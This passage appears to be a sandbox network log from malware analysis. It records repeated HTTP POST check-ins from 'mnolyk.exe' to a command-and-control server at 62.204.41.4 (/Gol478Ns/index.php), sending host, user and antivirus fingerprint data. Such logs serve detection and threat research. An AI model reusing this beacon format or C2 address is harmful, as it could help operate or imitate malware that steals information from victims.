                                                                      378 | 192.168.2.7 | 50106 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:41.418241978 CET | 838 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.483894110 CET | 838 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      379 | 192.168.2.7 | 50107 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:41.653832912 CET | 839 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.716232061 CET | 839 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      38 | 192.168.2.7 | 49762 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:06.819556952 CET | 470 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.885020971 CET | 470 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      380 | 192.168.2.7 | 50108 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:41.895553112 CET | 840 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.961169004 CET | 840 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      381 | 192.168.2.7 | 50109 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:42.135759115 CET | 841 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.199654102 CET | 841 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      382 | 192.168.2.7 | 50110 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:42.371968031 CET | 842 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.434534073 CET | 842 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      383 | 192.168.2.7 | 50111 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:42.623220921 CET | 843 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.686508894 CET | 843 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      384 | 192.168.2.7 | 50112 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:42.889738083 CET | 844 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.955672026 CET | 844 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      385 | 192.168.2.7 | 50113 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:43.122477055 CET | 845 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.189285994 CET | 845 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      386 | 192.168.2.7 | 50114 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:43.360833883 CET | 846 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.425688982 CET | 846 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      387 | 192.168.2.7 | 50115 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:43.614291906 CET | 847 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.680242062 CET | 847 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      388 | 192.168.2.7 | 50116 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:43.857815981 CET | 848 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.923408031 CET | 848 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      389 | 192.168.2.7 | 50117 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:44.099591970 CET | 849 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.165404081 CET | 849 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      39 | 192.168.2.7 | 49763 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:07.067395926 CET | 471 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.132951021 CET | 471 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      390 | 192.168.2.7 | 50118 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:44.342001915 CET | 850 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.405376911 CET | 850 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      391 | 192.168.2.7 | 50119 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:44.576880932 CET | 851 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.641315937 CET | 851 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      392 | 192.168.2.7 | 50120 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:44.810266972 CET | 852 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:44.874505997 CET | 852 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      393 | 192.168.2.7 | 50121 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:45.046253920 CET | 853 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.113672972 CET | 853 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      394 | 192.168.2.7 | 50122 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:45.289416075 CET | 854 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:45.355281115 CET | 854 | IN | HTTP/1.1 200 OK
